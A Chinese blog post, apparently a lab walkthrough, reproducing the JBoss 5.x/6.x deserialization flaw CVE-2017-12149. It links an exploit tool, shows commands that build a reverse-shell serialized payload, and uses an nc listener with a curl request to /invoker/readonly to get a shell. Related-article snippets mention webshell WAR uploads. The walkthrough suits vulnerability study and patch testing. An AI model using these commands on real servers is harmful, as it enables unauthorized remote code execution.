jboss java反序列化命令执行漏洞_JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)...

最新推荐文章于 2024-06-01 15:49:28 发布
最新推荐文章于 2024-06-01 15:49:28 发布
阅读量209 收藏
点赞数
文章标签: jboss java反序列化命令执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29660305/article/details/114312451
版权

本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程

仅供学习

靶机地址:192.168.1.102  服务端口:8080

测试机: 192.168.1.100

63fd7b347853b5ae8dd26dee8bb60243.png  

c83784de0b572c64cbe29cb61b18d161.png

响应码500,证明漏洞存在。

下载漏洞利用工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip

编译:(需要java环境)

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

运行:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port   //反弹shell的IP和端口

starnight:JavaDeserH2HC starnight$ javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

starnight:JavaDeserH2HC starnight$ java-cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.100:1337Saving serializedobject in ReverseShellCommonsCollectionsHashMap.ser

这样就会将序列化对象保存在ReverseShellCommonsCollectionsHashMap.ser中,用curl命令发送到Jboss服务地址。

先在测试机运行nc命令,进入监听模式:

starnight:temp starnight$ nc -lvv 1337

再打开另一个控制台,运行如下curl命令:

starnight:JavaDeserH2HC starnight$ curl -v http://192.168.1.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

运行截图:

56b63e9ca60988da215fd508c35fa16d.png

左侧是获取到shell,并执行命令。右侧是用curl命令运行截图。

References

吴奇霖
关注
JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
weixin_30606461的博客
11-27 175
  本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程 仅供学习   文中利用到漏洞环境由phith0n维护: JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)   靶机地址:192.168.1.102 服务端口:8080       测试机:192.168.1.100   搭建好环境,访问地址:http://192.168...
漏洞复现 :JBoss漏洞总结
qq_45751902的博客
10-31 1713
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
墨者_JBoss 5.x / 6.x反序列化漏洞分析溯源
weixin_50698958的博客
10-20 368
靶场: https://www.mozhe.cn/bug/detail/bVk4Z1hPRktPZStBVWV6QUw2YmY0dz09bW96aGUmozhe 背景介绍 JBoss 5.x / 6.x反序列化漏洞分析溯源 实训目标 1、了解JBoss 5.x / 6.x反序列化漏洞形成原理; 2、掌握JBoss 5.x / 6.x反序列化漏洞利用方法; 解题方向 利用JBoss 5.x / 6.x反序列化漏洞执行任意代码。 key在根目录; 解题思路: 访问JBoss漏洞页面,响应码..
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
JBOSS AS 5.x/6.x 反序列化命令执行漏洞CVE-2017-12149
fly小灰灰的专栏
12-04 4240
JBOSS AS 5.x/6.x 反序列化命令执行漏洞CVE-2017-12149)1. 漏洞描述 漏洞描述:该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞漏洞编号:CVE-2017-12149 漏洞等级:
jboss java反序列化命令执行漏洞_CVE-2017-12149JBoss 反序列化漏洞利用
weixin_32234493的博客
02-13 434
漏洞描述互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。影响范围漏洞影响5.x和6.x版本的JBOSSAS。漏洞原理JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可...
CVE-2017-12149 JBOSSAS 5.x/6.x 反序列化命令执行漏洞 CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞
m0_70714448的博客
06-01 410
漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。方法中的代码在没有进行任何安全检查的情况下,将来自客户端的数据流(request.getInputStream())进行了反序列化操作(红色箭头所示),从而导致了反序列化漏洞。1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
漏洞主要影响JBoss AS 7.x和EAP 6.x版本,这些版本中包含了`org.jboss.remoting3.protocol.ser`包,该包处理反序列化时存在缺陷。攻击者可以通过发送特制的序列化对象到服务器的RMI注册表,触发恶意代码执行。RMI...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反序列化是将之前序列化的对象状态恢复到可操作的Java对象的过程。然而,如果这个过程没有...
[ vulhub漏洞复现篇 ] JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149
qq_51577576的博客
08-31 1041
JBOSS AS 5.x/6.x反序列化远程代码执行漏洞CVE-2017-12149漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。...
[ vulhub漏洞复现篇 ] JBOSS AS 4.x以下反序列化远程代码执行漏洞CVE-2017-7504
qq_51577576的博客
09-01 1078
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)复现
薛定谔嘚喵博客
05-11 659
漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
关于JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)的复现
mw_myever的博客
10-06 705
一、漏洞介绍 该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞,该漏洞在内网中比较常见。 二、环境搭建 攻击机:192.168.70.2(kali) 受害机:192.168.70.3(vulhub) 利用命令:docker-compose up -d 启动环境 三、访问目标 1、探测 在kali上利用命令
JBoss4 反序列化漏洞
okkeqin的专栏
03-28 4651
JBOSS反序列化漏洞修改方案及验证   漏洞现象: 可以操控远程服务器 1、上传文件: 上传文件: 查看一下根目录是否存在test.xml文件 2、远程操作服务器 在CMD输入命令操控服务器     删除文件: 删除前处在test.xml文件         在CMD输入:rm -rf  test.txt 已经将文件删除   解
JBoss-反序列化命令执行漏洞(CVE-2017-12149)
大方子
07-30 3984
复现环境 win10 kali JavaDeserH2HC jboss-6.0.0 影响范围 JBoss 5.0.0~5.2.2 复现过程 进入JBoss的bin目录 run.bat -b 0.0.0.0 访问下http://192.168.61.1:8080/ 访问下http://192.168.61.1:8080/invoker/re...
职业教育中心 ASP教育中心网站程序网站源码,网站系统模板源码32.rar
09-23
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(随意编程),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无VIP,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于整理和收集资料耗费时间的酬劳 3. 积分资源不提供使用问题指导/解答
vue3+springboot农用车4S店管理系统[编号:CS_44067]源码数据库.zip
09-23
本文介绍了使用SpringBoot作为后端框架,Vue作为前端框架,MyBatis-Plus进行持久层开 。详细描述了系统测试的目的、功能测试案例,包括登录验证和用户管理,以及数据库设计。 前端:vue3 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架:springboot/ssm都支持 jdk版本:jdk1.8以上均可 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以
基于Spring Boot 2.6.7的轻量级日志脚手架EasyLog设计源码
最新发布
09-23
该项目是Easy Log,一个基于Spring Boot 2.6.7开发的轻量级日志框架。它包含59个文件,其中48个Java源文件、2个Git忽略文件、1个LICENSE文件、1个Markdown文档、1个用于运行Maven的shell脚本、1个命令脚本、1个XML配置文件、1个工厂配置文件和1个YAML配置文件。Easy Log旨在简化日志记录流程,提供接口请求日志、错误日志,并支持通过编程方式记录操作日志,是业务开发中日志管理的得力助手。
26.Jboss可能存在反序列化漏洞(1.5分) A.错 B.对
06-13
正确答案是 B. 对。JBoss 是一款流行的 Java 应用服务器,提供了丰富的功能和组件,广泛用于企业级应用的开发和部署。由于其复杂性和强大的功能,JBoss 也可能存在多种不同类型的漏洞,其中包括反序列化漏洞反序列化漏洞是一种常见的安全问题,由于 Java 序列化机制的缺陷,在反序列化过程中可能会触发恶意的代码执行,从而导致服务器被攻击者控制。攻击者可以利用反序列化漏洞执行任意代码、获取敏感信息、绕过身份验证、实现远程代码执行等攻击。在 JBoss 中,如果应用程序使用了反序列化,而且没有正确的限制反序列化的类和对象,就可能存在反序列化漏洞。因此,在开发和部署 JBoss 应用程序时,需要注意反序列化漏洞的风险,并采取相应的安全措施,例如限制反序列化的类和对象、使用安全的序列化机制等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值